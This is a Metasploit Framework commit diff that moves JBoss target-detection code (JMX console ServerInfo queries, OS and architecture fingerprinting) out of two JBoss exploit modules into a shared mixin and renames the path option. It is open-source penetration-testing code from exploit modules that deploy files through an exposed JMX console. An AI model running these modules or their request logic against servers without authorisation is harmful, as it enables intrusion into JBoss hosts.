Refactoring jboss module to work with the Mixin

us3r777 · us3r777 · commit af9f3b83a7ba · 2014-08-27T22:54:40.000+02:00
Removed datastore USERNAME and PASSWORD which are provided by
Msf::Exploit::Remote::HttpClient. Removed datastore PATH and VERB which
are provided by the mixin (lib/msf/http/jboss). Moved target detection
to the mixin.
diff --git a/lib/msf/http/jboss/base.rb b/lib/msf/http/jboss/base.rb
@@ -46,4 +46,73 @@ def http_verb
     datastore['VERB']
   end
 
+
+  def auto_target
+    if http_verb == 'HEAD' then
+      print_status("Sorry, automatic target detection doesn't work with HEAD requests")
+    else
+      print_status("Attempting to automatically select a target...")
+      res = query_serverinfo
+      if not (plat = detect_platform(res))
+        fail_with(Failure::NoTarget, 'Unable to detect platform!')
+      end
+
+      if not (arch = detect_architecture(res))
+        fail_with(Failure::NoTarget, 'Unable to detect architecture!')
+      end
+
+      # see if we have a match
+      targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }
+    end
+
+    # no matching target found, use Java as fallback
+    java_targets = targets.select {|t| t.name =~ /^Java/ }
+    return java_targets[0]
+  end
+
+  def query_serverinfo
+    path = normalize_uri(target_uri.path.to_s, '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo')
+    res = send_request_raw(
+      {
+        'uri'    => path,
+        'method' => http_verb
+      })
+
+    unless res && res.code == 200
+      print_error("Failed: Error requesting #{path}")
+      return nil
+    end
+
+    res
+  end
+
+  # Try to autodetect the target platform
+  def detect_platform(res)
+    if res && res.body =~ /<td.*?OSName.*?(Linux|FreeBSD|Windows).*?<\/td>/m
+      os = $1
+      if (os =~ /Linux/i)
+        return 'linux'
+      elsif (os =~ /FreeBSD/i)
+        return 'linux'
+      elsif (os =~ /Windows/i)
+        return 'win'
+      end
+    end
+
+    nil
+  end
+
+  # Try to autodetect the target architecture
+  def detect_architecture(res)
+    if res && res.body =~ /<td.*?OSArch.*?(x86|i386|i686|x86_64|amd64).*?<\/td>/m
+      arch = $1
+      if (arch =~ /(x86|i386|i686)/i)
+        return ARCH_X86
+      elsif (arch =~ /(x86_64|amd64)/i)
+        return ARCH_X86
+      end
+    end
+
+    nil
+  end
 end
diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb
@@ -195,73 +195,4 @@ def exploit
     handler
   end
 
-  def auto_target
-    if http_verb == 'HEAD' then
-      print_status("Sorry, automatic target detection doesn't work with HEAD requests")
-    else
-      print_status("Attempting to automatically select a target...")
-      res = query_serverinfo
-      if not (plat = detect_platform(res))
-        fail_with(Failure::NoTarget, 'Unable to detect platform!')
-      end
-
-      if not (arch = detect_architecture(res))
-        fail_with(Failure::NoTarget, 'Unable to detect architecture!')
-      end
-
-      # see if we have a match
-      targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }
-    end
-
-    # no matching target found, use Java as fallback
-    java_targets = targets.select {|t| t.name =~ /^Java/ }
-    return java_targets[0]
-  end
-
-  def query_serverinfo
-    path = normalize_uri(target_uri.path.to_s, '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo')
-    res = send_request_raw(
-      {
-        'uri'    => path,
-        'method' => http_verb
-      })
-
-    unless res && res.code == 200
-      print_error("Failed: Error requesting #{path}")
-      return nil
-    end
-
-    res
-  end
-
-  # Try to autodetect the target platform
-  def detect_platform(res)
-    if res && res.body =~ /<td.*?OSName.*?(Linux|FreeBSD|Windows).*?<\/td>/m
-      os = $1
-      if (os =~ /Linux/i)
-        return 'linux'
-      elsif (os =~ /FreeBSD/i)
-        return 'linux'
-      elsif (os =~ /Windows/i)
-        return 'win'
-      end
-    end
-
-    nil
-  end
-
-  # Try to autodetect the target architecture
-  def detect_architecture(res)
-    if res && res.body =~ /<td.*?OSArch.*?(x86|i386|i686|x86_64|amd64).*?<\/td>/m
-      arch = $1
-      if (arch =~ /(x86|i386|i686)/i)
-        return ARCH_X86
-      elsif (arch =~ /(x86_64|amd64)/i)
-        return ARCH_X86
-      end
-    end
-
-    nil
-  end
-
 end
diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
@@ -1,5 +1,3 @@
-# -*- coding: binary -*-
-
 ##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -12,7 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] }
 
-  include Msf::Exploit::Remote::HttpClient
+  include Msf::HTTP::JBoss
 
   def initialize(info = {})
     super(update_info(info,
@@ -78,12 +76,8 @@ def initialize(info = {})
     register_options(
       [
         Opt::RPORT(8080),
-        OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
-        OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
         OptString.new('JSP',   [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),
-        OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),
-        OptString.new('PATH',  [ true,  'The URI path of the JMX console', '/jmx-console' ]),
-        OptEnum.new('VERB', [true, 'HTTP Method to use (for CVE-2010-0738)', 'POST', ['GET', 'POST', 'HEAD']])
+        OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ])
       ], self.class)
   end
 
@@ -274,14 +268,14 @@ def upload_file(base_name, jsp_name, content)
     if (datastore['VERB'] == "POST")
       res = send_request_cgi(
         {
-          'uri'    => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
+          'uri'    => normalize_uri(datastore['TARGETURI'], '/HtmlAdaptor'),
           'method' => datastore['VERB'],
           'data'   => data
         }, 5)
     else
       res = send_request_cgi(
         {
-          'uri'    =>  normalize_uri(datastore['PATH'], '/HtmlAdaptor') + "?#{data}",
+          'uri'    =>  normalize_uri(datastore['TARGETURI'], '/HtmlAdaptor') + "?#{data}",
           'method' => datastore['VERB'],
         }, 30)
     end
@@ -305,14 +299,14 @@ def delete_file(folder, name, ext)
     if (datastore['VERB'] == "POST")
       res = send_request_cgi(
         {
-          'uri'    => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
+          'uri'    => normalize_uri(datastore['TARGETURI'], '/HtmlAdaptor'),
           'method' => datastore['VERB'],
           'data'   => data
         }, 5)
     else
       res = send_request_cgi(
         {
-          'uri'    => normalize_uri(datastore['PATH'], '/HtmlAdaptor;index.jsp') + "?#{data}",
+          'uri'    => normalize_uri(datastore['TARGETURI'], '/HtmlAdaptor;index.jsp') + "?#{data}",
           'method' => datastore['VERB'],
         }, 30)
     end
@@ -321,6 +315,7 @@ def delete_file(folder, name, ext)
 
   # Call the URL multiple times until we have hit
   def call_uri_mtimes(uri, num_attempts = 5)
+    verb = datastore['VERB']
     verb = 'HEAD' if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
 
     # JBoss might need some time for the deployment. Try 5 times at most and
@@ -353,70 +348,4 @@ def call_uri_mtimes(uri, num_attempts = 5)
     end
   end
 
-
-  def auto_target
-    print_status("Attempting to automatically select a target...")
-    res = query_serverinfo
-    if not (plat = detect_platform(res))
-      fail_with(Failure::NoTarget, 'Unable to detect platform!')
-    end
-
-    if not (arch = detect_architecture(res))
-      fail_with(Failure::NoTarget, 'Unable to detect architecture!')
-    end
-
-    # see if we have a match
-    targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }
-
-    # no matching target found, use Java as fallback
-    java_targets = targets.select {|t| t.name =~ /^Java/ }
-    return java_targets[0]
-  end
-
-
-  def query_serverinfo
-    path = normalize_uri(datastore['PATH'], '/HtmlAdaptor') + '?action=inspectMBean&name=jboss.system:type=ServerInfo'
-    res = send_request_raw(
-      {
-        'uri'    => path,
-        'method' => datastore['VERB']
-      }, 20)
-
-    if (not res) or (res.code != 200)
-      print_error("Failed: Error requesting #{path}")
-      return nil
-    end
-
-    res
-  end
-
-  # Try to autodetect the target platform
-  def detect_platform(res)
-    if (res.body =~ /<td.*?OSName.*?(Linux|FreeBSD|Windows).*?<\/td>/m)
-      os = $1
-      if (os =~ /Linux/i)
-        return 'linux'
-      elsif (os =~ /FreeBSD/i)
-        return 'linux'
-      elsif (os =~ /Windows/i)
-        return 'win'
-      end
-    end
-    nil
-  end
-
-
-  # Try to autodetect the target architecture
-  def detect_architecture(res)
-    if (res.body =~ /<td.*?OSArch.*?(x86|i386|i686|x86_64|amd64).*?<\/td>/m)
-      arch = $1
-      if (arch =~ /(x86|i386|i686)/i)
-        return ARCH_X86
-      elsif (arch =~ /(x86_64|amd64)/i)
-        return ARCH_X86
-      end
-    end
-    nil
-  end
-
 end
